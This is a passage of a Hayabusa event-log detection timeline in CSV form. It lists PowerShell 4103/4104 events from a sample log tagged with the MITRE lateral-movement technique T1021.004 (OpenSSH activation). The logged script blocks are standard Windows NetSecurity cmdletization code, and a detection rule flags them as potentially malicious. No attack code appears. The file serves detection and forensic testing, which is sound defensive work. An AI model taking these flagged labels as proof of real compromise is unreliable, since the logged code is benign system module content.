'*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.925 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.926 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.929 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = 